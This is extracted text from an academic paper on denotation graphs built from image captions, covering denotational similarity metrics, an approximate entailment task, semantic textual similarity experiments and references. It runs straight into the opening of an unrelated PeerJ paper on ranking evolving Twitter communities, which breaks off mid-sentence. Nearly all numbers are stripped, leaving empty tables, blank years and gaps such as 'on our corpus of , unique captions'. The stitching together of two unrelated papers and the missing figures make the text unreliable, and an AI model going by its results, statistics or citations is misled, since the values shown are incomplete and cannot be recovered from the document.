pp, but “a man with red shoes and a white-haired woman” as two nps, and to transform e.g. “stand- ing by a man and a woman” into “standing” and not “standing and a woman” when dropping the pp. hypernym lexicon we use our corpus and word- net to construct a hypernym lexicon that allows us to replace head nouns with more generic terms. we only consider hypernyms that occur themselves with sufficient frequency in the original captions (replac- ing “adult” with “person”, but not with “organ- ism”). since the language in our corpus is very concrete, each noun tends to have a single sense, al- lowing us to always replace it with the same hyper- nyms. but since wordnet provides us with mul- tiple senses for most nouns, we first have to iden- tify which sense is used in our corpus. to do this, we use the heuristic cross-caption coreference algo- rithm of hodosh et al. ( ) to identify coreferent np chunks among the original five captions of each image. for each ambiguous head noun, we con- sider every non-singleton coreference chains it ap- pears in, and reduce its synsets to those that stand in a hypernym-hyponym relation with at least one other head noun in the chain. finally, we apply a greedy majority voting algorithm to iteratively nar- row down each term’s senses to a single synset that is compatible with the largest number of coreference chains it occurs in. caption normalization in order to increase the recall of the denotations we capture, we drop all punctuation marks, and lemmatize nouns, verbs, and adjectives that end in “-ed” or “-ing” before gener- descriptions of people that refer to both age and gen- der (e.g. “man”) can have multiple distinct hypernyms (“adult”/’“male”). because our annotators never describe young children or babies as “persons”, we only allow terms that are likely to describe adults or teenagers (including occu- pations) to be replaced by the term “person”. this means that the term “girl” has two senses: a female child (the default) or a younger woman. we distinguish the two senses in a preprocess- ing step: if the other captions of the same image do not mention children, but refer to teenaged or adult women, we assign girl the woman-sense. some nouns that end in -er (e.g. “diner”, “pitcher” also violate our monosemy assumption. coreference resolution has also been used for word sense disambiguation by preiss ( ) and hu and liu ( ). ating the denotation graph. in order to distinguish between frequently occurring homonyms where the noun is unrelated to the verb, we change all forms of the verb dress to dressed, all forms of the verb stand to standing and all forms of the verb park to park- ing. finally, we drop sentence-initial there/here/this is/are (as in there is a dog splashing in the water), and normalize the expressions in x and dressed (up) in x (where x is an article of clothing or a color) to wear x. we reduce plural determiners to {two, three, some}, and drop singular determiners except for no. . rule templates the denotation graph contains a directed edge from s to s′ if there is a rule ω that reduces s′ to s, with an inverse ω− that expands s to s′. reduction rules can drop optional material, extract simpler constituents, or perform lexical substitutions. drop pre-nominal modifiers: “red shirt” → “shirt” in an np of the form “x y z”, where x and y both modify the head z, we only allow x and y to be dropped separately if “x z” and “y z” both occur elsewhere in the corpus. since “white building” and “stone building” occur else- where in the corpus, we generate both “white build- ing” and “stone building” from the np “white stone building”. but since “ice player” is not used, we replace “ice hockey player” only with “hockey player” (which does occur) and then “player”. drop other modifiers “run quickly” → “run” we drop advp chunks and adverbs in vp chunks. we also allow a prepositional phrase (a preposi- tion followed by a possibly conjoined np chunk) to be dropped if the preposition is locational (“in”, “on”, “above”, etc.), directional (“towards”, “through”, “across”, etc.), or instrumental (“by”, “for”, “with”). similarly, we also allow the drop- ping of all “wear np” constructions. since the dis- tinction between particles and prepositions is often difficult, we also use a predefined list of phrasal verbs that commonly occur in our corpus to identify constructions such as “climb up a mountain”, which is transformed into “climb a mountain” or “walk down a street”, which is transformed into “walk”. replace nouns by hypernyms: “red shirt” → “red clothing” we iteratively use our hypernym generategraph(): q, captions, rules ←∅ for all c ∈ imagecorpus do rules(c) ← generaterules(sc) pushall(q,{c}×rootnodes(sc, rules(c))) while ¬empty(q) do (c, s) ← pop(q) captions(s) ← captions(s) ∪{c} if |captions(s)| = then for all c′ ∈ captions(s) do pushall(q,{c′}×children(s, rules(c′))) else if |captions(s)| > then pushall(q,{c}×children(s, rules(c))) figure : generating the graph lexicon to make head nouns more generic. we only allow head nouns to be replaced by their hypernyms if any age based modifiers have already been re- moved: “toddler” can be replaced with “child”, but not “older toddler” with “older child”. handle partitive nps: cup of tea → “cup”, “tea” in most partitive np -of-np constructions (“cup of tea”, “a team of football players”) the correspond- ing entity can be referred to by both the first or the second np. exceptions include the phrase “body of water”, and expressions such as “a kind/type/sort of ”, which we treat similar to determiners. handle vp -to-vp cases depending on the first verb, we replace vps of the form x to y with both x and y if x is a movement or posture (jump to catch, etc.). otherwise we distinguish between cases we can only replace with x (wait to jump) and those we can only replace with y (seem to jump). extract simpler constituents any noun phrase or verb phrase can also be used as a node in the graph and simplified further. we use the malt de- pendencies (and the person terms in the entity type lexicon) to identify and extract subject-verb-object chunks which correspond to simpler sentences that we would otherwise not be able to obtain: from “man laugh(s) while drink(ing)”, we extract “man laugh” and “man drink”, and then further split those into “man”, “laugh(s)”, and “drink”. . graph generation the naive approach to graph generation would be to generate all possible strings for each caption. how- ever, this would produce far more strings than can be processed in a reasonable amount of time, and most of these strings would have uninformative denota- tions, consisting of only a single image. to make graph generation tractable, we use a top-down al- gorithm which generates the graph from the most generic (root) nodes, and stops at nodes that have a singleton denotation (figure ). we first identify the set of rules that can apply to each original caption (generaterules). these rules are then used to re- duce each caption as much as possible. the resulting (maximally generic) strings are added as root nodes to the graph (rootnodes), and added to the queue q. q keeps track of all currently possible node ex- pansions. it contains items 〈c,s〉, which pair the id of an original caption and its image (c) with a string (s) that corresponds to an existing node in the graph and can be derived from c’s caption. when 〈c,s〉 is processed, we check how many captions have gen- erated s so far (captions(s)). if s has more than a single caption, we use each of the applicable rewrite rules of c’s caption to create new strings s′ that cor- respond to the children of s in the graph, and push all resulting 〈c,s′〉 onto q. if c is the second caption of s, we also use all of the applicable rewrite rules from the first caption c′ to create its children. a post-processing step (not shown in figure ) attaches each original caption to all leaf nodes of the graph to which it can be reduced. finally, we obtain the denotation of each node s from the set of images whose captions are in captions(s). the denotation graph size and coverage on our corpus of , unique captions and , images, the denotation graph contains , , captions, out of which , describe more than a single image. ta- ble provides the distribution of the size of deno- tations. it is perhaps surprising that the cap- tions which describe each over , images do not just consist of nouns such as person, but also contain simple sentences such as woman standing, adult work, person walk street, or person play in- strument. since the graph is derived from the origi- nal captions by very simple syntactic operations, the denotations it captures are most likely incomplete: jsoccer playerk contains images, jplay soccerk contains images, and jsoccer gamek contains size of denotations |jsk| ≥ |jsk| ≥ |jsk| ≥ |jsk| ≥ |jsk| ≥ |jsk| ≥ nr. of captions , , , , , , table : distribution of the size of denotations in our graph images. we have not yet attempted to iden- tify variants in word order (“stick tongue out” vs. “stick out tongue”) or equivalent choices of prepo- sition (“look into mirror” vs. “look in mirror”). de- spite this brittleness, the current graph already gives us a large number of semantic associations. denotational similarities the following exam- ples of the similarities found by npmi jk and pjk show that denotational similarities do not simply find topically related events, but instead find events that are related by entailment: pjk(x|y) x y . sit eat lunch . play guitar strum . surf catch wave . ride horse rope calf . listen sit in classroom if someone is eating lunch, it is likely that they are sitting, and people who sit in a classroom are likely to be listening to somebody. these entail- ments can be very precise: “walk up stair” entails “ascend”, but not “descend”; the reverse is true for “walk down stair”: pjk(x|y) x =ascend x =descend y =walk up stair . . y =walk down stair . . npmi jk captures paraphrases as well as closely related events: people look in a mirror when shav- ing their face, and baseball players may try to tag someone who is sliding into base: npmi jk x y . open present unwrap . lasso try to rope . get ready to kick run towards ball . try to tag slide into base . shave face look in mirror comparing the expressions that are most similar to “play baseball” or “play football” according to the denotational npmi jk and the compositional Σ similarities reveals that the denotational similarity finds a number of actions that are part of the partic- ular sport, while the compositional similarity finds events that are similar to playing baseball (football): play baseball npmi jk Σ . tag him . play softball . hold bat . play game . try to tag . play ball . slide into base . play catch . pitch ball . play cricket play football npmi jk Σ . tackle person . play game . hold football . play rugby . run down field . play soccer . wear white jersey . play on field . avoid . play ball task : approximate entailment a caption never provides a complete description of the depicted scene, but commonsense knowledge often allows us to draw implicit inferences: when somebody mentions a bride, it is quite likely that the picture shows a woman in a wedding dress; a pic- ture of a parent most likely also has a child or baby, etc. in order to compare the utility of denotational and distributional similarities for drawing these in- ferences, we apply them to an approximate entail- ment task, which is loosely modeled after the rec- ognizing textual entailment problem (dagan et al., ), and consists of deciding whether a brief cap- tion h (the hypothesis) can describe the same image as a set of captions p = {p , ...,pn} known to de- scribe the same image (the premises). data we generate positive and negative items 〈p,h,±〉 (figure ) as follows: given an image, any subset of four of its captions form a set of premises. a hypothesis is either a short verb phrase or sentence that corresponds to a node in the deno- tation graph. by focusing on short hypotheses, we minimize the possibility that they contain extrane- ous details that cannot be inferred from the premises. positive examples are generated by choosing a node h as hypothesis and an image i ∈ jhk such that ex- actly one caption of i generates h and the other four captions of i are not descendants of h and hence do not trivially entail h, giving an unfair advantage to denotational approaches. negative examples are generated by choosing a node h as hypothesis and selecting four of the captions of an image i ∈ jhk. premises: a woman with dark hair in bending, open mouthed, towards the back of a dark headed toddler’s head. a dark-haired woman has her mouth open and is hugging a little girl while sitting on a red blanket. a grown lady is snuggling on the couch with a young girl and the lady has a frightened look. a mom holding her child on a red sofa while they are both having fun. vp hypothesis: make face premises: a man editing a black and white photo at a computer with a pencil in his ear. a man in a white shirt is working at a computer. a guy in white t-shirt on a mac computer. a young main is using an apple computer. s hypothesis: man sit figure : positive examples from the approximate entailment tasks. since our items are created automatically, a posi- tive hypothesis is not necessarily logically entailed by its premises. we have performed a small-scale human evaluation on items ( positive, negative), each judged independently by the same three judges (inter-annotator agreement: fleiss-κ = . ). our results indicate that over half ( %) of the positive hypotheses can be inferred from their premises alone without looking at the original im- age, while almost none of the negative hypotheses ( % for sentences, % for verb phrases) can be inferred from their premises. the training items are generated from the captions of , images, and the test items are generated from a disjoint set of , images. the vp data set consists of , training items and , test items, while the s data set consists of , training items and , test items. half of the items in each set are positive, and the other half are negative. models all of our models are binary maxent clas- sifiers, trained using mallet (mccallum, ). we have two baseline models: a plain bag-of-words model (bow) and a bag-of-words model where we add all hypernyms in our lexicon to the captions be- fore computing their overlap (bow-h). this is in- tended to minimize the advantage the denotational features obtain from the hypernym lexicon used to construct the denotation graph. in both cases, a global bow feature captures the fraction of tokens in the hypothesis that are contained in the premises. word-specific bow features capture the product of the frequencies of each word in h and p. all other models extend the bow-h model. denotational similarity features we compute denotational similarities npmi jk and pjk (sec- tion . ) over the pairs of nodes in a denotation graph that is restricted to the training images. we only consider pairs of nodes n,n′ if their denota- tions contain at least images and their intersection contains at least images. to map an item 〈p,h〉 to denotational simi- larity features, we represent the premises as the set of all nodes p that are ancestors of its cap- tions. a sentential hypothesis is represented as the set of nodes h = {hs,hsbj,hv p ,hv,hdobj} that correspond to the sentence (h itself), its sub- ject, its vp and its direct object. a vp hypothe- sis has only the nodes h = {hv p ,hv,hdobj}. in both cases, hdobj may be empty. both of the de- notational similarities npmi jk(h,p) and pjk(h|p) for h ∈ h, p ∈ p lead to two constituent- specific features, sumx and maxx, (e.g. sumsbj =∑ p sim(hsbj,p), maxdobj = maxp sim(hdobj,p)) and two global features sump,h = ∑ p,h sim(h,p) and maxp,h = maxp,h sim(h,p). each constituent type also has a set of node-specific sumx,s and maxx,s features that are on when constituent x in h is equal to the string s and whose value is equal to the constituent-based feature. for pjk, each con- stituent (and each constituent-node pair) has an ad- ditional feature p(h|p) = − ∏ n( −pjk(h|pn)) that estimates the probability that h is generated by some node in the premise. lexical similarity features we use two sym- metric lexical similarities: standard cosine distance (cos), and lin ( )’s similarity (lin): cos(w,w′) = w·w ′ ‖w‖‖w′‖ lin(w,w′) = ∑ i:w(i)> ∧w′(i)> w(i)+w ′(i)∑ i w(i)+ ∑ i w ′(i) we use two directed lexical similarities: clarke ( )’s similarity (clk), and szpektor and dagan ( )’s balanced precision (bal), which builds on lin and on weeds and weir ( )’s similarity (w): clk(w | w′) = ∑ i:w(i)> ∧w′(i)> min(w(i),w ′(i)) ∑ i w(i) bal(w | w′) = √ w(w | w′) × lin(w,w′) w(w | w′) = ∑ i:w(i)> ∧w′(i)> w(i)∑ i w(i) we also use two publicly available resources that provide precomputed similarities, kotlerman et al. ( )’s direct noun and verb rules and chklovski and pantel ( )’s verbocean rules. both are motivated by the need for numerically quantifiable semantic inferences between predicates. we only use entries that correspond to single tokens (ignor- ing e.g. phrasal verbs). each lexical similarity results in the follow- ing features: words in the output are represented by a max-simw feature which captures its max- imum similarity with any word in the premises (max-simw = maxw′∈p sim(w,w′)) and by a sum-simw feature which captures the sum of its sim- ilarities to the words in the premises (sum-simw =∑ w′∈p sim(w,w ′)). global max sim and sum sim features capture the maximal (resp. total) similarity of any word in the hypothesis to the premise. we compute distributional and compositional similarities (cos, lin, bal, clk, Σ, Π) on our im- age captions (“cap”), the bnc and gigaword. for each corpus c, we map each word w that appears at least times in c to a vector wc of the non- negative normalized pointwise mutual information scores (section . ) of w and the , words (ex- cluding stop words) that occur in the most sentences of c. we generally define p(w) (and p(w,w′)) as the fraction of sentences in c in which w (and w′) occur. to allow a direct comparison between dis- tributional and denotational similarities, we first de- fine p(w) (and p(w,w′)) over individual captions (“cap”), and then, to level the playing field, we rede- fine p(w) (and p(w,w′)) as the fraction of images in whose captions w (and w′) occur (“img”), and then we use our lexicon to augment captions with all hypernyms (“+hyp”). finally, we include bnc and gigaword similarity features (“all”). vp task s task baseline : bow . . baseline : bow-h . . external : direct . . external : verbocean . . cap all cap all distributional cos . . . . distributional lin . . . . distributional bal . . . . distributional clk . . . . compositional Π . . . . compositional Σ . . . . compositional Π, Σ . . . . denotational npmi jk . . denotational pjk . . npmi jk, pjk . . combined cos, Π, Σ . . . . npmi jk, pjk, Π, Σ . . . . npmi jk, pjk, cos . . . . npmi jk, pjk, cos, Π, Σ . . . . table : test accuracy on approximate entailment. compositional similarity features we use two standard compositional baselines to combine the word vectors of a sentence into a single vector: ad- dition (s∑ = w + ... + wn, which can be inter- preted as a disjunctive operation), and element-wise (hadamard) multiplication (s∏ = w � ... � wn, which can be seen as a conjunctive operation). in both cases, we represent the premises (which con- sist of four captions) as a the sum of each caption’s vector p = p + ...p . this gives two composi- tional similarity features: Σ = cos(pΣ,hΣ), and Π = cos(pΠ,hΠ). . experimental results table provides the test accuracy of our mod- els on the vp and s tasks. adding hypernyms (bow-h) yields a slight improvement over the ba- sic bow model. among the external resources, verbocean is more beneficial than direct, but neither help as much as in-domain distributional similarities (this may be due to sparsity). table shows only the simplest (“cap”) and the most complex (“all”) distributional and com- positional models, but table provides accuracies of these models as we go from standard sentence- based co-occurrence counts towards more denota- tion graph-like co-occurrence counts that are based on all captions describing the same image (“img”), vp task s task cap img +hyp all cap img +hyp all cos . . . . . . . . lin . . . . . . . . bal . . . . . . . . clk . . . . . . . . Π . . . . . . . . Σ . . . . . . . . Π, Σ . . . . . . . . npmi jk . . pjk . . npmi jk, pjk . . table : accuracy on hypotheses as various additions are made to the vector corpora. cap is the image corpus with caption co-occurrence. img is the image corpus with im- age co-occurrence. +hyp augments the image corpus with hypernyms and uses image co-occurrence. all adds the bnc and gigaword corpora to +hyp. vp task s task words in h + + % of items . . . . . . bow-h . . . . . . cos (all) . . . . . . ∑ (all) . . . . . . npmi jk . . . . . . table : accuracy on hypotheses of varying length. include hypernyms (“+hyp”), and add informa- tion from other corpora (“all”). the “+hyp” col- umn in table shows that the denotational metrics clearly outperform any distributional metric when both have access to the same information. al- though the distributional models benefit from the bnc and gigaword-based similarities (“all”), their performance is still below that of the denotational models. among the distributional model, the simple cos performs better than lin, or the directed clk and bal similarities. in all cases, giving models access to different similarity features improves performance. table shows the results by hypothesis length. as the length of h increases, classifiers that use sim- ilarities between pairs of words (bow-h and cos) continue to improve in performance relative to the classifiers that use similarities between phrases and sentences (Σ and npmi jk). most likely, this is due to the lexical similarities having a larger set of fea- tures to work with for longer h. npmi jk does espe- cially well on shorter h, likely due to the shorter h having larger denotations. task : semantic textual similarity to assess how the denotational similarities perform on a more established task and domain, we apply them to the sentence pairs from the msr video description corpus (chen and dolan, ) that were annotated for the semeval semantic tex- tual similarity (sts) task (agirre et al., ). the goal of this task is to assign scores between and to a pair of sentences, where indicates equivalence, and unrelatedness. since this is a symmetric task, we do not consider directed similarities. and be- cause the goal of this experiment is not to achieve the best possible performance on this task, but to compare the effectiveness of denotational and more established similarities, we only compare the impact of denotational similarities with compositional sim- ilarities computed on our own corpus. since the msr video corpus associates each video with mul- tiple sentences, it is in principle also amenable to a denotational treatment, but the sts task description explicitly forbids its use. . models baseline and compositional features our start- ing point is bär et al. ( )’s dkpro similarity, one of the top-performing models from the sts shared task, which is available and easily mod- ified. it consists of a log-linear regression model trained on multiple text features (word and charac- ter n-grams, longest common substring and longest common subsequence, gabrilovich and markovitch ( )’s explicit semantic analysis, and resnik ( )’s wordnet-based similarity). we investigate the effects of adding compositional (computed on the vectors obtained from the image-caption train- ing data) and denotational similarity features to this state-of-the-art system. denotational features since the sts task is symmetric, we only consider npmi jk similari- ties. we again represent each sentence s by fea- tures based on types of constituents: s = {ss,ssbj,sv p ,sv,sdobj}. since sentences might be complex, they might contain multiple constituents of the same type, and we therefore think of each feature as a feature over sets of nodes. for each constituent c we consider two sets of nodes in the denotation graph: c itself (typically leaf nodes), dkpro +Σ, Π (img) +npmi jk +both pearson r . . . . table : performance on the sts msrvid task: dkpro (bär et al., ) plus compositional (Σ, Π) and/or deno- tational similarities (npmi jk) from our corpus and canc, their parents and grandparents. for each pair of sentences, c-c similarities compute the similarity of the constituents of the same type, while c-all similarities compute the similarity of a c constituent in one sentence against all con- stituents in the other sentence. for each pair of constituents we consider three similarity features: sim(c ,c ), max(sim(c canc ), sim(c anc ,c )), sim(canc ,c anc ). the similarity of two sets of nodes is determined by the maximal similarity of any pair of their elements: sim(c ,c ) = maxc ∈c ,c ∈c npmi jk(c ,c ). this gives us c-c features and c-all features. . experiments we use the sts train/test data, normalized in the same way as the image captions for the deno- tation graph (i.e. we re-tokenize, lemmatize, and remove determiners). table shows experimental results for four models: dkpro is the off-the-shelf dkprosimilarity model (bär et al., ). from our corpus, we either add additive and multiplicative compositional features (Σ, Π) from section (img), the c-c and c-all denotational features based on npmi jk, or both compositional and denotational features. systems are evaluated by the pearson cor- relation (r) of their predicted similarity scores to the human-annotated ones. we see that the denotational similarities outperform the compositional similari- ties, and that including compositional similarity fea- tures in addition to denotational similarity features has little effect. for additional comparison, the published numbers for the takelab semantic text similarity system (šarić et al., ), another top- performing model from the shared task, are r = . on this dataset. conclusion summary of contributions we have defined novel denotational metrics of linguistic similarity (section ), and have shown them to be at least competitive with, if not superior to, distributional similarities for two tasks that require simple se- mantic inferences (sections , ), even though our current method of computing them is somewhat brittle (section ). we have also introduced two new resources: a large data set of images paired with descriptive captions, and a denotation graph that pairs generalized versions of these captions with their visual denotations, i.e. the sets of im- ages they describe. both of these resources are freely available (http://nlp.cs.illinois.edu/ denotation.html) although the aim of this paper is to show their utility for a purely linguistic task, we believe that they should also be of great interest for people who aim to build systems that automat- ically associate image with sentences that describe them (farhadi et al., ; kulkarni et al., ; li et al., ; yang et al., ; mitchell et al., ; kuznetsova et al., ; gupta et al., ; hodosh et al., ). related work and resources we believe that the work reported in this paper has the potential to open up promising new research directions. there are other data sets that pair images or video with de- scriptive language, but we have not yet applied our approach to them. chen and dolan ( )’s msr video description corpus (of which the sts data is a subset) is most similar to ours, but its curated part is significantly smaller. instead of several in- dependent captions, grubinger et al. ( )’s iapr tc- data set contains longer descriptions. or- donez et al. ( ) harvested million images and their user-generated captions from flickr to create the sbu captioned photo dataset. these captions tend to be less descriptive of the image. the de- notation graph is similar to berant et al. ( )’s ‘entailment graph’, but differs from it in two ways: first, entailment relations in the denotation graph are defined extensionally in terms of the images de- scribed by the expressions at each node, and sec- ond, nodes in berant et al.’s entailment graph corre- spond to generic propositional templates (x treats y ), whereas nodes in our denotation graph corre- spond to complete propositions (a dog runs). acknowledgements we gratefully acknowledge the support of the national science foundation under nsf awards “int -medium: understanding the mean- ing of images”, “career: bayesian mod- els for lexicalized grammars”, and “ci- p:collaborative research: visual entailment data set and challenge for the language and vision com- munity”, as well as via an nsf graduate research fellowship to alice lai. references eneko agirre, mona diab, daniel cer, and aitor gonzalez-agirre. . semeval- task : a pilot on semantic textual similarity. in proceedings of the first joint conference on lexical and computational semantics - volume : proceedings of the main confer- ence and the shared task, and volume : proceedings of the sixth international workshop on semantic eval- uation, semeval ’ , pages – . daniel bär, torsten zesch, and iryna gurevych. . dkpro similarity: an open source framework for text similarity. in proceedings of the st annual meeting of the association for computational linguis- tics: system demonstrations, pages – , sofia, bulgaria, august. jon barwise and john perry. . situations and atti- tudes. journal of philosophy, : – . jonathan berant, ido dagan, and jacob goldberger. . learning entailment relations by global graph structure optimization. computational linguistics, ( ): – . greg carlson, . the encyclopedia of language and linguistics, chapter generics, habituals and iteratives. elsevier, nd edition. david chen and william dolan. . collecting highly parallel data for paraphrase evaluation. in pro- ceedings of the th annual meeting of the associa- tion for computational linguistics: human language technologies, pages – , portland, oregon, usa, june. timothy chklovski and patrick pantel. . verbo- cean: mining the web for fine-grained semantic verb relations. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , barcelona, spain, july. kenneth ward church and patrick hanks. . word association norms, mutual information, and lexicogra- phy. computational linguistics, ( ): – . daoud clarke. . context-theoretic semantics for natural language: an overview. in proceedings of the workshop on geometrical models of natural lan- guage semantics, pages – , athens, greece, march. ido dagan, oren glickman, and bernardo magnini. . the pascal recognising textual entailment challenge. in machine learning challenges, volume of lecture notes in computer science, pages – . springer. david dowty, robert wall, and stanley peters. . in- troduction to montague semantics. reidel, dordrecht. ali farhadi, mohsen hejrati, mohammad amin sadeghi, peter young, cyrus rashtchian, julia hockenmaier, and david forsyth. . every picture tells a story: generating sentences from images. in proceed- ings of the european conference on computer vision (eccv), part iv, pages – , heraklion, greece, september. evgeniy gabrilovich and shaul markovitch. . com- puting semantic relatedness using wikipedia-based ex- plicit semantic analysis. in proceedings of the th international joint conference on artifical intelligence, ijcai’ , pages – . michael grubinger, paul clough, henning müller, and thomas deselaers. . the iapr benchmark: a new evaluation resource for visual information sys- tems. in ontoimage , workshop on language resources for content-based image retrieval during lrec , pages – , genoa, italy, may. ankush gupta, yashaswi verma, and c. jawahar. . choosing linguistics over vision to describe images. in proceedings of the twenty-sixth aaai conference on artificial intelligence, toronto, ontario, canada, july. zellig s harris. . distributional structure. word, : – . micah hodosh, peter young, cyrus rashtchian, and julia hockenmaier. . cross-caption coreference reso- lution for automatic image understanding. in proceed- ings of the fourteenth conference on computational natural language learning, pages – , uppsala, sweden, july. micah hodosh, peter young, and julia hockenmaier. . framing image description as a ranking task: data, models and evaluation metrics. journal of arti- ficial intelligence research (jair), : – . shangfeng hu and chengfei liu. . incorporating coreference resolution into word sense disambigua- tion. in alexander f. gelbukh, editor, computational linguistics and intelligent text processing, volume of lecture notes in computer science, pages – . springer berlin heidelberg. lili kotlerman, ido dagan, idan szpektor, and maayan zhitomirsky-geffet. . directional distributional similarity for lexical inference. natural language en- gineering, ( ): – . girish kulkarni, visruth premraj, sagnik dhar, siming li, yejin choi, alexander c. berg, and tamara l. berg. . baby talk: understanding and generat- ing simple image descriptions. in proceedings of the ieee conference on computer vision and pat- tern recognition (cvpr), pages – . polina kuznetsova, vicente ordonez, alexander berg, tamara berg, and yejin choi. . collective gener- ation of natural image descriptions. in proceedings of the th annual meeting of the association for com- putational linguistics (volume : long papers), pages – , jeju island, korea, july. siming li, girish kulkarni, tamara l. berg, alexan- der c. berg, and yejin choi. . composing sim- ple image descriptions using web-scale n-grams. in proceedings of the fifteenth conference on compu- tational natural language learning (conll), pages – , portland, or, usa, june. dekang lin. . an information-theoretic defini- tion of similarity. in proceedings of the fifteenth in- ternational conference on machine learning (icml), pages – , madison, wi, usa, july. bill maccartney and christopher d. manning. . modeling semantic containment and exclusion in nat- ural language inference. in proceedings of the nd international conference on computational linguis- tics (coling ), pages – , manchester, uk, august. andrew kachites mccallum. . mal- let: a machine learning for language toolkit. http://www.cs.umass.edu/ mccallum/mallet. shachar mirkin, ido dagan, and eyal shnarch. . evaluating the inferential utility of lexical-semantic resources. in proceedings of the th conference of the european chapter of the acl (eacl ), pages – , athens, greece, march. jeff mitchell and mirella lapata. . composition in distributional models of semantics. cognitive science, ( ): – . margaret mitchell, jesse dodge, amit goyal, kota ya- maguchi, karl stratos, xufeng han, alyssa mensch, alex berg, tamara berg, and hal daume iii. . midge: generating image descriptions from computer vision detections. in proceedings of the th confer- ence of the european chapter of the association for computational linguistics (eacl), pages – , avignon, france, april. richard montague. . formal philosophy: papers of richard montague. yale university press, new haven. edited by richmond h. thomason. joakim nivre, johan hall, and jens nilsson. . malt- parser: a data-driven parser-generator for dependency parsing. in proceedings of the international confer- ence on language resources and evaluation (lrec), pages – . vicente ordonez, girish kulkarni, and tamara l. berg. . im text: describing images using million captioned photographs. in advances in neural infor- mation processing systems , pages – . judita preiss. . anaphora resolution with word sense disambiguation. in proceedings of senseval- second international workshop on evaluating word sense disambiguation systems, pages – , toulouse, france, july. philip resnik. . using information content to evalu- ate semantic similarity in a taxonomy. in proceedings of the th international joint conference on artificial intelligence - volume , ijcai’ , pages – . idan szpektor and ido dagan. . learning entailment rules for unary templates. in proceedings of the nd international conference on computational linguis- tics (coling ), pages – , manchester, uk, august. coling organizing committee. frane šarić, goran glavaš, mladen karan, jan šnajder, and bojana dalbelo bašić. . takelab: sys- tems for measuring semantic text similarity. in pro- ceedings of the sixth international workshop on se- mantic evaluation (semeval ), pages – , montréal, canada, - june. julie weeds and david weir. . a general frame- work for distributional similarity. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – . yezhou yang, ching teo, hal daume iii, and yiannis aloimonos. . corpus-guided sentence genera- tion of natural images. in proceedings of the conference on empirical methods in natural lan- guage processing (emnlp), pages – , edin- burgh, uk, july. submitted october accepted january published february corresponding author konstantinos konstantinidis, konkonst@iti.gr academic editor radu marculescu additional information and declarations can be found on page doi . /peerj-cs. copyright konstantinidis et al. distributed under creative commons cc-by . open access exploring twitter communication dynamics with evolving community analysis konstantinos konstantinidis, symeon papadopoulos and yiannis kompatsiaris information technologies institute, centre for research and technology hellas, thessaloniki, greece abstract online social networks (osns) have been widely adopted as a means of news dissemination, event reporting, opinion expression and discussion. as a result, news and events are being constantly reported and discussed online through osns such as twitter. however, the variety and scale of all the information renders manual analysis extremely cumbersome, and therefore creating a storyline for an event or news story is an effort-intensive task. the main challenge pertains to the magnitude of data to be analyzed. to this end, we propose a framework for ranking the resulting communities and their metadata on the basis of structural, contextual and evolutionary characteristics such as community centrality, textual entropy, persistence and stability. we apply the proposed framework on three twitter datasets and demonstrate that the analysis that followed enables the extraction of new insights with respect to influential user accounts, topics of discussion and emerging trends. these insights could primarily assist the work of social and political analysis scientists and the work of journalists in their own story telling, but also highlight the limitations of existing analysis methods and pose new research questions. to our knowledge, this study is the first to investigate the ranking of dynamic communities. in addition, our findings suggest future work regarding the determination of the general context of the communities based on structure and evolutionary behavior alone. subjects data mining and machine learning, network science and online social networks, social computing keywords online social networks, community evolution detection, community ranking, data mining introduction osns have become influential means of disseminating news, reporting events and posting ideas as well as a medium for opinion formation (topirceanu et al., ). such networks combined with advanced statistical tools are often seen as the best sources of real-time information about global phenomena (lazer et al., ; aiello et al., ). numerous studies of osns in relation to a variety of events have been conducted based on data from twitter, a micro-blogging service that allows users to rapidly disseminate and receive information within the limit of characters in a direct, grouped or global manner (williams, terras & warwick, ; nikolov et al., ). twitter is currently one how to cite this article konstantinidis et al. ( ), exploring twitter communication dynamics with evolving community analysis. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:konkonst@iti.gr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. according to company statistics: http://about.twitter.com/company (last accessed on august ). of the largest osn platforms, with million monthly active users and as such the vast amounts of information shared through it cannot be accessed or made use of unless this information is somehow organized. thus, appropriate means of filtering and sorting are necessary to support efficient browsing, influential user discovery, and searching and gaining an overall view of the fluctuating nature of online discussions. existing information browsing facilities, such as simple text queries typically result in immense amounts of posts rendering the inquirer clueless with respect to the online topics of discussion. since online social networks exhibit the property of community structure, one of the more implicit manners of grouping information and thus facilitating the browsing process is by detecting the communities formed within the network. research on community detection on static networks can be found in the lancichinetti & fortunato ( ) survey, as well as in the works of granell et al. ( ), newman ( ), leskovec, lang & mahoney ( ) and papadopoulos et al. ( ). real-world osns, however, are definitely not static. the networks formed in services such as twitter undergo major and rapid changes over time, which places them in the field of dynamic networks (asur, parthasarathy & ucar, ; giatsoglou & vakali, ; palla, barabasi & vicsek, ; takaffoli et al., ; tantipathananandh, berger-wolf & kempe, ; roy chowdhury & sukumar, ; gauvin, panisson & cattuto, ; greene, doyle & cunningham, ; aktunc et al., ; albano, guillaume & le grand, ). these changes are manifested as users join in or leave one or more communities, by friends mentioning each other to attract attention or by new users referencing a total stranger. these trivial interactions seem to have a minor effect on the local structure of a social network. however, the network dynamics could lead to a non-trivial transformation of the entire community structure over time, and consequently create a need for reidentification. particularly in osns, the immensely fast and unpredictably fluctuating topological structure of the resulting dynamic networks renders them an extremely complicated and challenging problem. additionally, important questions related to the origin and spread of online messages posted within these networks, as well as the dynamics of interactions among online users and their corresponding communities remain unanswered. to this end, we present a framework for analyzing and ranking the community structure, interaction and evolution in graphs. we also define a set of different evolution scenarios, which our method can successfully identify. a community here is essentially a subgraph which represents a set of interacting users as they tweet and mention one another. the edges of the subgraph represent the mentions made between users. a dynamic community is formed by a temporal array of the aforementioned communities with the condition that they share common users (cazabet & amblard, ; nguyen et al., ). community evolution detection has been previously used to study the temporal structure of a network (gauvin, panisson & cattuto, ; greene, doyle & cunningham, ; palla, barabasi & vicsek, ; takaffoli et al., ). however, even by establishing only the communities that sustain interest over time, the amount of communities and thus metadata that a user has to scan through is immense. in our previous work (konstantinidis, papadopoulos & kompatsiaris, ), we proposed an adaptive approach to discover communities at points in time of increasing interest, but also a size-based varying threshold konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://about.twitter.com/company https://peerj.com http://dx.doi.org/ . /peerj-cs. for use in community evolution 